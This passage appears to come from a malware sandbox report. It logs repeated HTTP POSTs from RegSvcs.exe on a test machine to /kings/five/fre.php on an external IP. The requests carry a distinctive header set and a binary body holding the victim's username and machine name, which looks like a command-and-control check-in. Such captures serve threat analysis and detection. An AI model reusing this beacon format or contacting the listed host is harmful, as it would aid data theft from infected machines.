Dec 4, 2024 06:53:55.529705048 CET	80	49930	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:55.529844999 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:55.529939890 CET	80	49930	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:55.529994011 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:55.649894953 CET	80	49930	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:55.680267096 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:55.800288916 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:55.800488949 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:55.802531004 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:55.922564983 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:55.922616959 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:56.042634964 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.398612022 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.398715019 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.398751020 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.398772001 CET	49936	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.518639088 CET	80	49936	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.534785986 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.654716969 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.654793024 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.656769991 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.777391911 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:57.777455091 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:57.897670031 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.245382071 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.245393038 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.245469093 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.245511055 CET	49941	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.365408897 CET	80	49941	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.378396034 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.498394966 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.498491049 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.500483036 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.620393038 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:59.620459080 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:59.740367889 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.080385923 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.080485106 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.080502033 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.080558062 CET	49946	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.200592995 CET	80	49946	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.247687101 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.367851973 CET	80	49950	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.367959976 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.369982958 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.490621090 CET	80	49950	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:01.491744995 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:01.611668110 CET	80	49950	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:02.961114883 CET	80	49950	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:02.961210012 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:02.961275101 CET	80	49950	94.156.177.41	192.168.2.4
Dec 4, 2024 06:54:02.961322069 CET	49950	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:54:03.081113100 CET	80	49950	94.156.177.41	192.168.2.4

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:06.647583961 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 176 Connection: close
Dec 4, 2024 06:52:06.767642021 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones549163JONES-PCk0FDD42EE188E931437F4FBE2CcdaTQ
Dec 4, 2024 06:52:08.289335012 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:08.575700045 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 176 Connection: close
Dec 4, 2024 06:52:08.695715904 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones549163JONES-PC+0FDD42EE188E931437F4FBE2CzSjPa
Dec 4, 2024 06:52:10.175102949 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:10.358481884 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:10.478754044 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:11.901484966 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:12.175564051 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:12.295748949 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:13.773469925 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:14.043212891 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:14.164338112 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:15.532588005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:15.818129063 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:15.938258886 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:17.218137980 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:17.537750006 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:17.657826900 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:19.025707006 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:19.285294056 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:19.405358076 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:20.880343914 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:21.141326904 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:21.262165070 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:22.682821035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:22.952970982 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:23.073188066 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:24.551582098 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:24.812109947 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:24.932097912 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:26.402652979 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:26.673463106 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:26.793786049 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:28.258573055 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49759	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:28.517987013 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:28.638241053 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:30.177768946 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:30.445363045 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:30.565483093 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:32.085510969 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49762	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:32.772286892 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:32.892280102 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:34.340843916 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:34.614860058 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:34.734954119 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:36.018158913 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49766	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:36.287272930 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:36.409349918 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:37.879709959 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:38.227730036 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:38.347814083 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
